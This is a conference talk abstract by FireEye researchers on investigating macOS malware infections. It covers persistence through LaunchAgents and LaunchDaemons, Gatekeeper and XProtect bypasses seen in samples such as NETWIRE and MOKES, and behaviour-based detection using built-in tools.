Demystifying macOS: An investigation into the dynamics of macOS attacks

Akhil Reddy, Bharath Manapati, Rakesh Sharma/FireEye

There is a common myth that the macOS is very secure. As in the case of myths, there is a slight amount of truth laced to this one as well, due to the presence of various anti-malware features like the Gatekeeper and XProtect equipped into the OS. We have observed scenarios where malware was delivered via 0-day exploits, circumventing all these protections and infecting the users, which proves that even macOS machines need to be monitored for identifying malicious activity.

Attackers leverage LaunchAgents and LaunchDaemons to establish persistence and attempt to disguise them to avoid suspicion. Some of these attacks weaponize built-in tools for data exfiltration. In this presentation, we dive into an investigative and behavior based approach to easily identify the anomalies in an infected mac and trace them back to the binary or to the application and its artifacts.

As part of the presentation, we will analyze some of the recent mac malware seen in the wild such as LAMEPYRE, NETWIRE and MOKES. NETWIRE and MOKES were delivered via a Firefox 0-day exploit which bypassed all defense mechanisms. The analysis includes how the malware was able to bypass Gatekeeper and XProtect. We will further discuss on how to use built-in tools for this analysis.

In conclusion, we will demonstrate how behavior based techniques can help detection engines to proactively identify unknown threats in mac threatscape.

November 7 at 16:10 - 16:40, Stage B